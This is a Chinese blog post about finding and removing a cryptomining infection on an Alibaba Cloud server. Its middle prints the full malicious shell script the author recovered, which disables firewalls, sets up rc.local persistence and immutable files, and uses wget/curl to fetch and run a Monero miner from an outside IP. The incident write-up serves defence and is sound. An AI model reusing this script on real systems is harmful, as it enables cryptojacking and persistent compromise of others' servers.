记一次服务器被攻击处理

最新推荐文章于 2024-07-07 15:13:18 发布
最新推荐文章于 2024-07-07 15:13:18 发布
阅读量3.1k 收藏 3
点赞数 2
分类专栏: web server 文章标签: 服务器 病毒
知识本就需要传播,如果你需要请自行转走。
本文链接:https://blog.csdn.net/medivhq/article/details/72357954
版权

基本情况:服务器没有表象的被攻击征兆,只是偶然登录阿里云控制台,发现主机cpu一个月来占用率都是100%;
于是ssh上服务器执行命令

top -c //看看哪些占用cpu比较高

发现有两个mysql用户的进程各占用47%左右,这两个几乎就占用了全部的cpu。想着服务器上的数据库已经迁移到了阿里云,所以就kill掉他们,然后又查看cpu占用,发现依然有两个这样的进行,只是pid改变了,于是我关闭了mysqld,情况发生了改变。
这里写图片描述

果真是被入侵了,我看下有哪些mysql进程。

这里写图片描述

其中有一个/bin/bash ./db_temp/haha和./xiao xxx的进程我觉得很可疑
我全局查找haha 发现是个恶意脚本,就赶紧改掉文件名杀掉进程,后又杀掉所有./xiao进程
cpu恢复正常。
目测是shell漏洞引发的,还有待确认。
下面是注入的程序内容:

#!/bin/bash
chmod 777 xiao
chattr 777 haha
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop
echo 'nameserver 8.8.8.8'> /etc/resolv.conf
grep "nohup ./haha >/dev/null 2>&1 &" /etc/rc.d/rc.local >/dev/null
if [ $? -eq 0 ]; then
chmod 777 xiao
sleep 1
chattr +i haha
else
echo "nohup ./haha >/dev/null 2>&1 &" >> /etc/rc.d/rc.local
chmod +x /etc/rc.d/rc.local
chmod +x haha
chmod 777 xiao
chattr +i haha
fi
while true
do
    ps aux | grep xiao | grep -v grep
    if [ $? -eq 0 ];then
         sleep 10
         chmod 777 xiao
         chattr +i xiao
            nohup rm -rf index.html >/dev/null 2>&1 &
         rm -rf nohup.out
    else
        if [ -f xiao ];then
        chmod 777 xiao
        chattr +i xiao
         nohup ./xiao -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 48pYmKDVHLGRtUsM9owu4B6rH5jcxZ4pARyNE6kb4CpB77aZ6EQQwGzfMBmCphMMzgYnYJqZJpLXXWw5m8UgPdpLTsjBUno -p x >/dev/null 2>&1 &
        else
 wget http://120.27.240.44:8080/xiao ; chmod a+x xiao;chattr +i xiao;nohup ./xiao -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 48pYmKDVHLGRtUsM9owu4B6rH5jcxZ4pARyNE6kb4CpB77aZ6EQQwGzfMBmCphMMzgYnYJqZJpLXXWw5m8UgPdpLTsjBUno -p x >/dev/null 2>&1 &
            if [ -f xiao ];then
        chmod 777 xiao
        chattr +i xiao
         nohup ./xiao -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 48pYmKDVHLGRtUsM9owu4B6rH5jcxZ4pARyNE6kb4CpB77aZ6EQQwGzfMBmCphMMzgYnYJqZJpLXXWw5m8UgPdpLTsjBUno -p x >/dev/null 2>&1 &
        else
             curl -O http://120.27.240.44:8080/xiao ; chmod a+x xiao;chattr +i xiao;nohup ./xiao -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 48pYmKDVHLGRtUsM9owu4B6rH5jcxZ4pARyNE6kb4CpB77aZ6EQQwGzfMBmCphMMzgYnYJqZJpLXXWw5m8UgPdpLTsjBUno -p x >/dev/null 2>&1 &
         rm -rf nohup.out
fi
   fi
       fi
done
Jinx_Q
关注
专栏目录
Debian服务器攻击的调查报告
不用此栏
07-23 1068
具体攻击过程分析  格林威治时间礼拜四,11月19日下午5时左右,入侵者使用一个窃取到的密码登陆到klecker服务器(.debian.org)所在的开发 人员帐号上 (普通权限帐号),接着通过HTTP取回一个本地内核木马程序并使用该程序获得root权限,然后安装了root -kit程序。入侵者然后使用同一帐号和密码进入master服务器并用同样手段获得root权限并安装了SuckIT roo
服务器遭遇攻击处理
Field_Yang的博客
08-07 8059
服务器遭遇攻击处理 系统被植入rootkit之类的程序后,最安全有效的方法是直接重新安装系统。绝大多数攻击程序会依附在系统文件或者内核中,只有重装系统才能确保彻底清除攻击源。 一、服务允许马上切断网络处理基本流程: 1、切断网络:切断感染源,防止二次感染 2、查找攻击源:分析系统日志、登录日志、命令历史等,查看系统开启的端口、端口运行的进程,是否存在可疑进程等 3、分析入侵可能原因和途径...
这几天,服务器攻击
用心去做
07-26 1548
由于网络安全方面也是小白,我就写一下整个过程吧。最终也没有彻底解决,希望有经验的朋友看到能够指点一下。 一、官网跳转到博cai网站 今天突然有人反映,打开公司官网,却跳到了一个博cai网站。 我赶紧在浏览器输入公司域名打开看看,一切正常。一开始还以为同事开玩笑,然后他截图过来,还真是。如下图: 对比打开官网的方式之后,我发现,他是在百度搜索,而我是直接输入域名。 于是我也在百度搜索再点击进入...
服务器被恶意攻击怎么办?| 解决方案
最新发布
MCYUN_Shop的博客
07-07 541
服务器攻击可能会对业务造成严重影响。通过迅速反应、采取适当的缓解措施,并从每次事件中学习,组织可以增强其网络的安全性和复原能力。对于所有负责网络和服务器管理的人员来说,制定和维护一个全面的安全策略是至关重要的。
服务器被恶意攻击了怎么办?
驰网飞飞的博客
11-17 827
服务器被恶意攻击d解决方法前言1、建立良好的硬件安全防御系统2、使用英文操作系统3、选择安全可靠的域名提供商4、防止黑客入侵(1)采用NTFS文件系统格式(2)做好系统备份(3)关掉不需要的服务,只开需要的端口(4)安装防火墙和杀毒软件(5)打开事件日志服务(6)在RAS使用上开启回叫功能(7)及时下载更新Windows补丁程序(8)制定一个稳定强有力的安全策略 前言 随着互联网的迅速发展,网络安全面临着严峻的挑战,一些恶意的服务器攻击行为也层出不穷。无论是正规企业网站、游戏网站、购物网站或是棋牌室、文娱网
服务器攻击的四种现象以及解决办法!
changfenghai的专栏
03-18 1846
服务器对于网站运行非常重要,在日常维护服务器的工作中,服务器不能创建对象最为常见。造成服务器不能创建的原因不同,其处理的方式也有很大的差别。常见的原因及处理的方法是维护服务器工作者必须掌握的知识。 一、服务器不能创建对象如果是Scripting.FileSystemObject(FSO 文本文件读写)被关闭了,开启FSO功能即可,在“运行”中执行regsvr32 scrrun.dll即可。这也是
服务器攻击方式及防御措施?
热门推荐
咻一咻的博客
07-04 1万+
主流的服务器攻击方式有多种手段,但是唯独DDoS攻击、CC攻击以及ARP欺骗,这些攻击方式被称为三大攻击手段,不仅可以致使服务器瘫痪,而且还很无解。 DDOS攻击 DDoS攻击全名叫做分布式拒绝服务(DDoS:Distributed Denial of Service),攻击者往往将多个计算机平台联合起来对同一个目标或者多个目标进行攻击攻击所造成的后果也因此而严重程度不同。 DDoS攻...
服务器攻击该怎么办?
weixin_50720651的博客
09-10 989
1、切断网络 对服务器所有的攻击都来源于网络,因此,当服务器遭受攻击的时候,首先就要切断网络,一方面能够迅速切断攻击源,另一方面也能保护服务器所在网络的其他主机。 2、查找攻击源 要根据自身经验和综合判断能力,通过分析系统日志或登录日志文件,找出可疑信息,分析可疑程序。 3、分析入侵原因和途径 一定要查清楚遭受攻击的具体原因和途径,有可能是系统漏洞或程序漏洞等多种原因造成的,只有找到问题根源,才能够及时修复系统。 4、备份好用户数据 当服务器遭受攻击的时候,就要立刻备份好用户数据,同时也要注意这些数据是否存
一次linux服务器攻击处理经历
kapuchang的博客
02-24 8033
首先发现IO、流量异常。查找登录录,果不其然last命令没有结果,/var/log/wtmp文件被删除。查找/var/log/secure文件中的登录录:grep "Accept" /var/log/secure查dstat的日志文件,正是10:51分开始出现IO异常。用nethogs 、 iftop工具可以查看到本机与几个不知哪的ip端口建立了很多连接。初步处理是打开防火墙,仅打开需要用到的...
一次入侵Linux服务器和删除木马程序的经历
09-15
本文档描述了一次针对Linux服务器的入侵事件及其后续的处理过程。该事件始于一次流量异常的发现,进而揭示了服务器遭受木马攻击的事实。 #### 入侵检测 - **流量监控**:通过持续监测网络流量,可以及时发现异常...
阿里云服务器被恶意ddos攻击了怎么办?
weixin_67757219的博客
11-24 1418
这就是高防IP的原理和怎么接入的方式,介绍了以上这几点,相信大家也就了解怎么帮助这个客服解决这个ddos攻击的问题了,之前这位客户在阿里云被攻击的最高峰值是98G,那么为了安全起见建议这个客户上了一个200G的高防IP,才花了一万每月的花费,接入了一个200G的高防IP,果然,接入了两个小时后,对方的ddos来了,这次打到了150G的量,但还是没超过峰值,轻松防住,之后的几天客户的项目平稳的运行,这不昨天还介绍了他的一个好哥们的来我们这做了套100G的防护。以上就是高防IP的介绍,那么他的原理是什么呢?
维护被攻击后的Linux服务器的方法
06-27
维护被攻击后的Linux服务器的方法
一次阿里云被攻击的过程!阿里云linux服务器,项目正常启动,一会自动关闭!
HBQandJAVA的博客
04-29 2288
突然有一天,远程连不上阿里云服务器,回忆远程链接密码并没有错,就重启了阿里云实例, 结果!!!! 一个新的大坑才浮出水面。 阿里云里的项目启动之后,log里也显示正常,在10秒左右,服务器自动关闭,没有任何提示!!!! 翻看之前的命令历史,多出这么一条,去网上查一下,也有一个遇到的同僚,但并没有解决问题!!!! CHECK_TYPE=SHELL; echo "INFO=${CHEC...
服务器攻击怎么办
weixin_67757219的博客
04-20 669
很多刚创业的小伙伴当自己的服务器攻击的时候会特别迷茫不知所措。其实在互联网行业遭受恶意攻击不是一件稀奇的事,有来自同行的竞争,黑客的勒索,还有一部分找肉鸡的扫描。所以说千万不要一被攻击就乱了自己的手脚。找个专业的安全团队就能轻松解决的问题,有什么可急躁的。 小蚁云安全团队从业服务器防御有着十几年的经验,针对DDOS、CC、渗透、入侵等等都有着自己完善的防御体系。防御产品从高防IP、高防CDN、小蚁盾、大禹立体式抗D体系、WAF防火墙、入侵检测等等络绎不绝,没有防不住的攻击只有你不找我们。 今天就先给大家介
Linux类服务器遭受攻击排查取证
weixin_42261331的博客
09-14 1283
前言: 大家日常早就对Windows中的病毒习惯了,对付Windows中的病毒,有很多办法:杀毒软件、专杀工具等,但是这些东西往往主要集中在windows这一领域。 很多企业使用了Linux操作系统,原因主要是Linux的安全性比较高,但随着业务及技术发展,面向Linux系统的攻击越来越多,Linux机器也会感染病毒。本文会对Linux病毒攻击排查及如何防范做初步的介绍。 Linux系统被入侵/中毒的表象,比较常见的中毒表现在以下三个方面: 1)服务器出去的带宽会跑高这个是中毒的一个特征。 ..
服务器老被攻击,该如何解决?
weixin_67757219的博客
12-02 2865
举个例子:大家都知道智能手机极不耐摔,而且屏幕维修价格昂贵,所以产生了“碎屏险”这种东西,对于一两千块钱的手机来说,购买几百块钱的碎屏险或许是很不划算的一件事,但对于动辄五千到上万元的高端机型来说,碎屏险就很有必要了,因为你无法保证手机在使用过程当中不会摔在地上,届时高昂的维修成本将会是一件令人烦恼的事情。另外,仔细检查文件权限,谁有何种级别的权限。服务器攻击来源都必须通过互联网,一旦切断网络,它们就失去了攻击的入口,你可以通过切断网络的方式,以最快的速度切断攻击源,保护服务器所在网络的其他主机服务器
几个有效防止服务器攻击的小妙招
qq2453939845的博客
04-10 841
互联网的高速增长,线上办公,线上娱乐越来越多,也带来巨大的经济收益,但有经济利益的地方,就有人想非法会去从中获利,最直接的方法就是去攻击这些网站的服务器了。 网络攻击方式多种多样,大概可以分成四类型: 1、人性式攻击,比如钓鱼式攻击; 2、中间人攻击,各式各样的网络攻击,几乎都是中间人攻击,比如ARP欺骗、DNS欺骗; 3、缺陷式攻击,如DDOS攻击; 4、漏洞式攻击,就是所谓的0day Hack...
linux服务器攻击处理方法
kevin_LCC的专栏
11-07 6194
对于一些在云平台上租用的服务器
服务器攻击怎么办,如何防范服务器攻击
weixin_44792503的博客
09-15 331
如果网站被恶意攻击无法访问怎么办?服务器一直被攻击怎么办?如何才能防范服务器攻击服务器攻击的常见方式有两种:一种是CC,一个是DDOS。如果是CC攻击方式,机房技术会根据攻击的类型及时调整策略, CDN的服务在策略上可以先过一层,很有效的针对CC攻击。 如果是DDOS,必须要机房有硬防才可以防御的,这个必须需要带宽充足才可以解决的,同时CDN进行分流和清洗等。 使用服务器之前可以通过一些简单的措施来提升服务器的安全问题,那么这些措施有哪些呢,该如何防范服务器攻击呢? 1、首先服务器一定要把admi
MMORPG服务器端架构设计与稳定性目标
2. **网关服务器**:作为前端和后端之间的桥梁,处理客户端的请求,进行**认证**、**授权**,防止**DoS攻击**。 3. **地图服务器**:管理游戏世界中的地图,处理玩家的位置移动和交互。 4. **服务器集群**:通过负载...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值